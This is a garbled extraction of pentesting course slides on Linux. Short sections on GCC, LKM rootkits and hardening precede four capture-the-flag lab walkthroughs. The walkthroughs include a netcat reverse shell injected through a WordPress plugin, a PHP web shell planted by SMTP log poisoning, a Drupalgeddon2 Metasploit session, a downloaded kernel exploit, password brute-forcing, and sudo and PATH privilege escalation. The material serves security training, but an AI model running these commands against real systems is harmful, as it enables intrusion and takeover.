Chapter 09

SUMMARY
 Chap01: Introduction to “Pentest”
 Chap02: Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering
 Chap03: Gathering Network and Host Information: Scanning and Enumeration
 Chap04: System Pentesting: Password Cracking, Escalating Privileges, and Hiding Files
 Chap05: Trojans, Backdoors, Viruses, and Worms
 Chap06: Gathering Data from Networks: Sniffers
 Chap07: Web Pentesting: Google, Web Servers, Web Application Vulnerabilities,
 Chap08: Attacking web Applications: SQL Injection
 Chap09: Pentesting Linux Systems
 Chap10: Pentesting Mobile Platforms (Android)

Chapter
ChaptChapt
Chapter 09: Hacking Linux Systems
er er
16
09 OBJECTIVES COVERED IN TH IS C H A PTER
1 Understand how to compile a Linux kernel
Understand GCC compilation commands
Understand how to install LKM modules
Understand Linux hardening methods

Hackin g Linux Sys te m s
Chapter
ChaptChapt
er er
6
09 6 Linux is a popular operating system with system
administrators because of its open source code and its
flexibility, which allows anyone to modify it. Because of the
open source nature of Linux, there are many different versions,
known as distributions (or distros)
 Several of the Linux distributions have become robust
commercial operating systems for use on workstations
as well as servers. Popular commercial distributions
include:
Linux’s flexibility and the fact that it’s open

source, together with the increase in Linux
applications, have made Linux the operating
system of choice for many systems.
Chapter
ChaptChapt Linux commands
er er
66
09
Chapter
ChaptChapt Linux directories
er er
66
09
Chapter
ChaptChapt GCC Compilation Commands
er er
66
09  GNU Compiler Collection (GCC) is a command-line compiler that takes source code
and makes it an executable. You can download it from http://gcc.gnu.org (many Linux
distributions also include a version of GCC). GCC can be used to compile and execute
C, C++, and FORTRAN applications so they are able to run on a Linux system
 Compiling C++ code with the GCC for use as an

application  Compiling C code with the GCC for use as an
g++ filename.cpp –o outputfilename.out application
gcc filename.c –o outputfilename.out
Linux Kernel Modules
Linux Kernel Modules (LKMs) let you add functionality to your operating system without
having to recompile the OS.A danger of using LKMs is that a rootkit can easily be created as
an LKM, and if loaded, it infects the kernel. For this reason, you should download LKMs only
from a verified good source
Examples of LKM rootkits are Knark, Adore, and
Rtkit. Because they infect the kernel, these rootkits are
more difficult to detect than those that do not manifest
themselves as LKMs. Once a system has been
compromised, the hacker can put the LKM in the /tmp
or the /var/tmp directory, which can’t be monitored by
the system administrator, thereby hiding processes,
files, and network connections. System calls can also
be replaced with those of the hacker’s choosing on a
system infected by an LKM rootkit
Chapter
ChaptChapt Linux Hardening Methods
er er
66
09  Hardening is the process of improving security on a system by making
modifications to the system. Linux can be made more secure by employing some
hardening methods
01 02 03
Use strong passwords The default security
Ensure that server is in
and not give out stance of deny all is a
a secure location such usernames or passwords. good one for hardening a
as a network Administrators should system from a network
operations center, make sure the system attack. Next, the
which prevents a doesn’t have null administrator can open
hacker from gaining passwords by verifying certain access for
physical access to the that all user accounts specific users,
system have passwords in the deny all users access
Linux /etc/shadow file from the network:
Cat “All:All”>>
/etc/hosts.deny
Chapter
er er
66
09
 Recommended steps to improve the security of a Linux server
1
Operating System Selection and Installation
- Use a widely recognized and known good Linux
distribution
- Apply any operating system patches that have been
released since the installation media was created
- Set up and enable IP tables
- Install a host-based intrusion detection system
(HIDS)
- Don’t install unnecessary applications or services
- Secure the boot loader program (such as lilo or
GRUB) with a password
2 Securing Local File Systems

- Look for inappropriate file and directory permissions
(Group and/or world writable system executables and
directories | Group and/or world writable user home
directories
- Encrypt sensitive data present on the system
- Select mount options (such as nosuid) for local file
systems that take advantage of security features
provided by the operating system
3 Configuring and Disabling Services
- Remove or disable all unneeded services
- Use secure versions of daemons when they are available
- If at all possible, run server processes as a special user created for that
purpose and not as root
- When appropriate, run servers in an isolated directory tree via the chroot
facility
- Specify access control and logging for all services
Chapter
er er
66
09
4
Securing the Root Account
- Select a secure root password, and plan a schedule
for changing it regularly
- If possible, restrict the use of the su command to a
single group
- Use sudo or system roles to grant other ordinary
users limited root privilege when needed
- Prevent direct root logins except on the system
console
Defining User Account Password Selection

5 and Aging Settings
- Set up default user account restrictions as
appropriate
- Ensure that administrative and other system accounts
to which no one should ever log in have a disabled
password and /bin/false or another non-login shell
- Remove unneeded predefined default accounts
Securing Remote Authentication

- Disable /etc/hosts.equiv and .rhosts password-less
6 authentication
- Use ssh and its related commands for all remote user
access. Disable rlogin, rsh, telnet, ftp, rcp, and so on
Chapter
er er
66
09
7
Performing Ongoing System Monitoring
- Configure the syslog facility. Send or copy syslog
messages to a central syslog server for redundancy
- Design and implement a plan for monitoring log
information for security-related events
Performing Miscellaneous Activities

8 - Remove any remaining source code for the kernel or
additional software packages from the system.
- Add the new host to the security configuration on
other systems, in router access control lists, and so
forth.
- Check for vendor security updates for any installed
software
Chapter
ChaptChapt
er er
66
09
Workshop
Linux Web server
exploitation
12
Linux Web server exploitation
LAB 0
Machine name: DC6
Machine name: CyberSploit 1
Machine name: VulnCMS: 1
Machine name: symfonos1
WestWild
13
CTF Name:WestWild: 1.1
Tags: - Enumeration with Enum4Linux

- remote access to shared folder with smb://X.X.X.X
- base64 decode
- Finding writable folders : find / -writable -type d 2>/dev/null
---------------------------------------------------------------------------------------------------------------------
- enum4linux 192.168.1.104
- smbclient \\192.168.1.104/wave
- ls
- get FLAG1.txt
- get message_from_aveng.txt
- base64 -d FLAG1.txt
- ssh wavex@192.168.70.134 (password: door+open)
- find / -writable -type d 2>/dev/null
- cd /usr/share/av/westsidesecret
- ls
- cat ififorget.sh
- su aveng
- sudo –l (this user can do everything with sudo)
- sudo su
- cd /root
- cat FLAG2.txt
LAB 1
Machine name: DC6
WestWild
15
LAB 1
 Machine name: CyberSploit 1
Get the target machine IP address

01
Scan open ports by using the Nmap scanner
02
Enumerate HTTP service and get the first flag
03
Get shell access and get the first flag
04
Get the root access and read the third flag
05
16
LAB 1

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sn 10.10.10.0/24
10.10.10.149
 The victim is at 10.10.10.149
└─$ nmap 10.10.10.149
22/tcp open ssh
80/tcp open http
 Few ports are open on the target machine: Port 22, which is used for the SSH service, is open, and port 80 for the HTTP
service is also open
└─$ dirb http://10.10.10.149
+ http://10.10.10.149/cgi-bin/ (CODE:403|SIZE:288)
+ http://10.10.10.149/hacker (CODE:200|SIZE:3757743)
+ http://10.10.10.149/index (CODE:200|SIZE:2333)
+ http://10.10.10.149/index.html (CODE:200|SIZE:2333)
+ http://10.10.10.149/robots (CODE:200|SIZE:79)
+ http://10.10.10.149/robots.txt (CODE:200|SIZE:79)
+ http://10.10.10.149/server-status (CODE:403|SIZE:293)
 robots.txt file with directory enumeration 17

 LINUX WEB SERVER EXPLOITATION
LAB 1
Alphanumerical string available in the robots.txt  detect hash with https://gchq.github.io/

 use magic operator
 Good Work !.Flag1: cybersploit{youtube.com/c/cybersploit}
Check the HTML content of the web page: Username:

itsskv
 SECTION 3: « FROM INITIAL ACCESS TO HIGHER PRIVILEGES »
LAB 1
SSH port 22 was also open on the target machine. As we have a valid username but no clue about the password was found, we
tried using the flag as password for logging into the SSH
└─$ ssh itsskv@10.10.10.149
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$
 Checked the user folder and found the second flag file
itsskv@cybersploit-CTF:~$ ls
Desktop Documents Downloads examples.desktop flag2.txt Music Pictures Public Templates Videos
itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100
01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111
01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111
01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
 seems to be a type of binary code: https://gchq.github.io/ (magic operator )

 good work !.flag2: cybersploit{https:t.me/cybersploit1}
19
LAB 1
Gather information about the operating system and the kernel version
itsskv@cybersploit-CTF:~$ uname -a
Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
itsskv@cybersploit-CTF:~$ cat /etc/issue
Ubuntu 12.04.5 LTS \n \l
We searched the web for an available exploit for this configuration: local exploit of Ubuntu 12.04.5
https://www.exploit-db.com/exploits/372
20
LAB 1
Dowload exploit to kali an run web server
└─$ wget https://www.exploit-db.com/download/37292
└─$ mv 37292 37292.c
└─$ sudo python -m SimpleHTTPServer 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 ...
Go to Victim and download and compile and run exploit
itsskv@cybersploit-CTF:/tmp$ wget http://10.10.10.140/37292.c

itsskv@cybersploit-CTF:/tmp$ gcc -o exploit 37292.c
itsskv@cybersploit-CTF:/tmp$ chmod +x exploit
itsskv@cybersploit-CTF:/tmp$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# # cd /root
# ls
finalflag.txt
# cat finalflag.txt 21
LAB 1
______ ____ ____ .______ _______ .______ _______..______ __ ______ __ .___________.

/ |\ \ / / | _ \ | ____|| _ \ / || _ \ | | / __ \ | | | |
| ,----' \ \/ / | |_) | | |__ | |_) | | (----`| |_) | | | | | | | | | `---| |----`
| | \_ _/ | _ < | __| | / \ \ | ___/ | | | | | | | | | |
| `----. | | | |_) | | |____ | |\ \----.----) | | | | `----.| `--' | | | | |
\______| |__| |______/ |_______|| _| `._____|_______/ | _| |_______| \______/ |__| |__|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
(c|o|n|g|r|a|t|u|l|a|t|i|o|n|s)
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
if you like it share with me https://twitter.com/cybersploit1.
Thanks !
#
22
LAB 2
Machine name: DC6
WestWild
23
LAB 2
 Machine name: VulnCMS: 1

01
02
Fingerprint used CMS
03
Use Metasploit
04
Exploit sudo misconfiguration
05
24
LAB 2
└─$ nmap -sn 10.10.10.0/24
10.10.10.149
 The victim is at 10.10.10.150
└─$ nmap –A 10.10.10.150
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
|_http-generator: WordPress 5.7.2
|_http-title: fsociety – Just another WordPress site
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: fsociety.web
 80: web server

 5000: Wordpress 5.7.2
 8081: Joomla
 9001: Drupal 7 Drupalgeddon !!! 25
LAB 2
Launch Metasploit console
└─$ msfconsole
Search for an exploit for Drupal 7
msf6 > search Drupal 7
Matching Modules
================
# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
26
LAB 2
Configure drupalgeddon 2 Exploit
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 10.10.10.140
lhost => 10.10.10.140
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lport 5151
lport => 5151
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 10.10.10.150
rhosts => 10.10.10.150
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 9001
rport => 9001
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
*] Started reverse TCP handler on 10.10.10.140:5151
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.150
[*] Meterpreter session 1 opened (10.10.10.140:5151 -> 10.10.10.150:42766) at 2021-12-02 04:40:00 -0500
meterpreter >
Meterpreter session is open now !
27
LAB 2
Enumeration
meterpreter > ls
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 includes
100755/rwxr-xr-x 529 fil 2017-02-01 16:34:27 -0500 index.php
100755/rwxr-xr-x 703 fil 2017-02-01 16:34:27 -0500 install.php
40755/rwxr-xr-x 4096 dir 2021-05-31 06:47:40 -0400 misc
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 modules
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 profiles
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 scripts
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 sites
 Unsual directory “misc”
meterpreter > cd misc

meterpreter > ls
100755/rwxr-xr-x 25035 fil 2017-02-01 16:34:27 -0500 ajax.js
100755/rwxr-xr-x 118 fil 2017-02-01 16:34:27 -0500 arrow-asc.png
100755/rwxr-xr-x 118 fil 2017-02-01 16:34:27 -0500 arrow-desc.png
100755/rwxr-xr-x 968 fil 2017-02-01 16:34:27 -0500 authorize.js
100755/rwxr-xr-x 8426 fil 2017-02-01 16:34:27 -0500 autocomplete.js
100644/rw-r--r-- 45 fil 2021-05-31 06:47:01 -0400 tyrell.pass
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 ui
100755/rwxr-xr-x 265 fil 2017-02-01 16:34:27 -0500 vertical-tabs-rtl.css
 tyrell.pass is interresting
28
LAB 2
meterpreter > cat tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_
 Username and password
Try Username and password in SSH
└─$ ssh tyrell@10.10.10.150 255 ⨯
The authenticity of host '10.10.10.150 (10.10.10.150)' can't be established.
ECDSA key fingerprint is SHA256:h1aOta4T0KpyD681E4pY8S7j2G4oSkfr23vwKMUD0B8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.150' (ECDSA) to the list of known hosts.
tyrell@10.10.10.150's password:
tyrell@vuln_cms:~$
Enumerate Sudores
tyrell@vuln_cms:~$ sudo -l
Matching Defaults entries for tyrell on vuln_cms:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tyrell may run the following commands on vuln_cms:

(root) NOPASSWD: /bin/journalctl
29
 tyrell can run /bin/journalctl with privileges
LAB 2
To exit from /bin/journalctl with higher privilege add !/bin/sh
ay 28 12:16:41 vuln_cms kernel: DMA32 [mem 0x0000000001000000-0x000000007ffeffff]

May 28 12:16:41 vuln_cms kernel: Normal empty
May 28 12:16:41 vuln_cms kernel: Device empty
May 28 12:16:41 vuln_cms kernel: Movable zone start for each node
May 28 12:16:41 vuln_cms kernel: Early memory node ranges
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
4359537020406305
Flag: 4359537020406305
30
LAB 3
Machine name: DC6
WestWild
31
LAB 3
 Machine name: DC6

01
02
Enumeration WPSCAN
03 HINT : password
contains k01
Exploiting : Searchsploit
04
Exploit sudo misconfiguration
05
32
LAB 3
- Scan with nmap to discover ip address
nmap -p- -A 192.168.62.131
 port 80 is opened
- Add wordy to hosts file
└─$ sudo nano /etc/hosts
 192.168.1.164 wordy
- Web reconnaissance
whatweb http://wordy
 wordpress
- Enumerate users
└─$ wpscan --url http://wordy --enumerate u
 admin mark graham sarah jens
- Create file users.txt and put usernames
- Use HINT to create passwords file :
└─$ cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
- Bruteforce password :
└─$ wpscan --url http://wordy -U /home/kali/Desktop/users.txt -P /home/kali/Desktop/passwords.txt
 SUCCESS  mark / helpdesk01
- Connect to backoffice : http://wordy/wp-admin
 not enough privileges
 notice a plugin “Active-monitor”
33
LAB 3
Searchsploit Active-monitor
└─$ searchsploit Activity monitor
Copy exploit to desktop
└─$ searchsploit -m 45274
Launch listener on kali
└─$ nc -nlvp 9999
Go to activity monitor and inspect code in input and change size to 100 and put 127.0.0.1 | nc 192.168.1.142 1234 -e
/bin/bash
34
LAB 3
┌──(kali㉿kali)-[~/Desktop] Connect ssh with user graham

└─$ nc -vlp 1234 ┌──(kali㉿kali)-[~/Desktop]
listening on [any] 1234 ... └─$ ssh graham@192.168.1.164
connect to [192.168.1.142] from wordy [192.168.1.164] 51414 Enumerate sudo rights
id graham@dc-6:~$ sudo -l
uid=33(www-data) gid=33(www-data) groups=33(www-data) Matching Defaults entries for graham on dc-6:
 Not privileged env_reset, mail_badpass,
cd /home/ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/s
cd mark bin\:/bin
ls
Stuff User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
cd stuff Show backups.sh wit
ls graham@dc-6:~$ cat /home/jens/backups.sh
things-to-do.txt #!/bin/bash
cat things-to-do.txt tar -czf backups.tar.gz /var/www/html
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
Edit backups.sh (to execute /bin/bash)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done #!/bin/bash
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement #tar -czf backups.tar.gz /var/www/html
/bin/bash
 Connected as jens
jens@dc-6:/home/graham$
35
LAB 3
jens@dc-6:/home/graham$ sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:

(root) NOPASSWD: /usr/bin/nmap
Create nmap script and execute it:

jens@dc-6:/home/graham$ echo "os.execute('/bin/sh')">/tmp/root.nse
sudo nmap --script=/tmp/root.nse
Id=0
36
LAB 4
Machine name: DC6
WestWild
37
LAB 4
 Machine name: symfonos1
Scanning : Nmap
01
Enumeration : SMB Shares folder, Wpscan
02
Exploiting: Exploiting WordPress again LFI ,
03 LFI to RCE via SMTP log Poising
Privilege Escalation: SUID

04
38
LAB 4
┌──(kali㉿kali)-[~/Desktop] ┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.0/24 └─$ enum4linux 192.168.1.171
Nmap scan report for 192.168.1.1 Sharename Type Comment
Host is up (0.0022s latency). --------- ---- -------
Nmap scan report for 192.168.1.2 print$ Disk Printer Drivers
Host is up (0.00034s latency). helios Disk Helios personal share
Nmap scan report for 192.168.1.142 anonymous Disk
Host is up (0.00014s latency).
Nmap scan report for 192.168.1.171 [+] Attempting to map shares on 192.168.1.171
//192.168.1.171/print$ Mapping: DENIED, Listing: N/A
//192.168.1.171/helios Mapping: DENIED, Listing: N/A
┌──(kali㉿kali)-[~/Desktop] //192.168.1.171/anonymous Mapping: OK, Listing: OK
└─$ nmap -A 192.168.1.171 //192.168.1.171/IPC$ [E] Can't understand response:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.25 ((Debian)) ┌──(kali㉿kali)-[~/Desktop]
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: └─$ smbclient //192.168.1.171/anonymous
WORKGROUP) smb: \> ls
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: . D 0 Fri Jun 28 21:14:49 2019
WORKGROUP) .. D 0 Fri Jun 28 21:12:15 2019
SMB activated : try to enumerate shares attention.txt N 154 Fri Jun 28 21:14:49 2019
39
LAB 4
┌──(kali㉿kali)-[~/Desktop] ┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //192.168.1.171/anonymous └─$ cat todo.txt
smb: \> get attention.txt 1. Binge watch Dexter
2. Dance
3. Work on /h3l105
└─$ cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty'
and 'baseball'! Next person I find using one of these passwords ┌──(kali㉿kali)-[~/Desktop]
will be fired! └─$ sudo nano /etc/hosts
127.0.0.1 localhost
Test passwords 'epidioko', 'qwerty' and 'baseball’ for helios 127.0.1.1 kali
user
┌──(kali㉿kali)-[~/Desktop] # The following lines are desirable for IPv6 capable hosts
└─$ smbclient //192.168.1.171/helios --user=helios ::1 localhost ip6-localhost ip6-loopback
Password for [WORKGROUP\helios]: ff02::1 ip6-allnodes
Try "help" to get a list of possible commands. ff02::2 ip6-allrouters
smb: \> ls 192.168.1.171 symfonos.local
. D 0 Fri Jun 28 20:32:05 2019
.. D 0 Fri Jun 28 20:37:04 2019
Go to http://192.168.1.171/h3l105/
research.txt A 432 Fri Jun 28 20:32:05 2019
todo.txt A 52 Fri Jun 28 20:32:05 2019
19994224 blocks of size 1024. 17305316 blocks └─$ whatweb http://192.168.1.171/h3l105/
available  WordPress 5.2.2
40
smb: \> get todo.txt
LAB 4
Enumerate Plugins and look for vulnerable one Go to
┌──(kali㉿kali)-[~/Desktop] http://192.168.1.171/h3l105/wp-content/plugins/mail-
└─$ wpscan --url http://symfonos.local/h3l105/ --enumerate p masta/inc/campaign/count_of_send.php?pl=/etc/passwd
i] Plugin(s) Identified:
[+] mail-masta
| Location: http://symfonos.local/h3l105/wp-
content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
To escalate LFI to RCE we can use SMTP log poison approach
└─$ searchsploit mail masta telnet 192.168.0.16 25
WordPress Plugin Mail Masta 1.0 - Local File Inclusion MAIL FROM: <sof>
| php/webapps/40290.txt RCPT TO: Helios
data
┌──(kali㉿kali)-[~/Desktop] <?php system($_GET['c']); ?>
└─$ searchsploit -m 40290 .
┌──(kali㉿kali)-[~/Desktop] Go to
└─$ cat 40290.txt http://symfonos.local/h3l105/wp-content/plugins/mail-
masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=id
LAB 4
LAB 4
Run netcat reverse command and start netcat listener on kali:
└─$ nc -vlp 1234
listening on [any] 1234 ...
Go to : http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=nc 192.168.1.142 1234 –e /bin/sh
──(kali㉿kali)-[~/Desktop] Try to export path for rouge curl

└─$ nc -vlp 1234 cd /tmp
listening on [any] 1234 ... echo "/bin/sh" > curl
connect to [192.168.1.142] from symfonos.local [192.168.1.171] 35234 chmod 777 curl
echo $PATH
export PATH=/tmp:$PATH
Search for suid files: /opt/statuscheck
find / -perm -u=s -type f 2>/dev/null id
 /opt/statuscheck (executed with root) cd /root
cat proof.txt
Strings /opt/statuscheck
 Curl

Chapter 09

Uploaded by

Copyright:

Available Formats

Chapter 09

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Chapter 09

Uploaded by

Copyright:

Available Formats

SUMMARY

 Chap01: Introduction to “Pentest”

 Chap02: Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering

 Chap03: Gathering Network and Host Information: Scanning and Enumeration

 Chap05: Trojans, Backdoors, Viruses, and Worms

 Chap06: Gathering Data from Networks: Sniffers

 Chap07: Web Pentesting: Google, Web Servers, Web Application Vulnerabilities,

 Chap08: Attacking web Applications: SQL Injection

 Chap09: Pentesting Linux Systems

 Chap10: Pentesting Mobile Platforms (Android)

1 Understand how to compile a Linux kernel

Understand GCC compilation commands

Understand how to install LKM modules

Understand Linux hardening methods

Linux’s flexibility and the fact that it’s open

 Compiling C++ code with the GCC for use as an

2 Securing Local File Systems

Defining User Account Password Selection

Securing Remote Authentication

Performing Miscellaneous Activities

Machine name: DC6

Machine name: CyberSploit 1

Machine name: VulnCMS: 1

Machine name: symfonos1

Tags: - Enumeration with Enum4Linux

Machine name: DC6

Machine name: CyberSploit 1

Machine name: VulnCMS: 1

Machine name: symfonos1

 Machine name: CyberSploit 1

Get the target machine IP address

 Machine name: CyberSploit 1

 The victim is at 10.10.10.149

 robots.txt file with directory enumeration 17

 Machine name: CyberSploit 1

Alphanumerical string available in the robots.txt  detect hash with https://gchq.github.io/

Check the HTML content of the web page: Username:

 seems to be a type of binary code: https://gchq.github.io/ (magic operator )

Go to Victim and download and compile and run exploit

itsskv@cybersploit-CTF:/tmp$ wget http://10.10.10.140/37292.c

______ ____ ____ .______ _______ .______ _______..______ __ ______ __ .___________.

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

if you like it share with me https://twitter.com/cybersploit1.

Machine name: DC6

Machine name: CyberSploit 1

Machine name: VulnCMS: 1

Machine name: symfonos1

 Machine name: VulnCMS: 1

Get the target machine IP address

 The victim is at 10.10.10.150

 80: web server

Search for an exploit for Drupal 7

msf6 > search Drupal 7

# Name Disclosure Date Rank Check Description

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

Meterpreter session is open now !

 Unsual directory “misc”

meterpreter > cd misc

 Username and password

__ . _ . _.. ._______.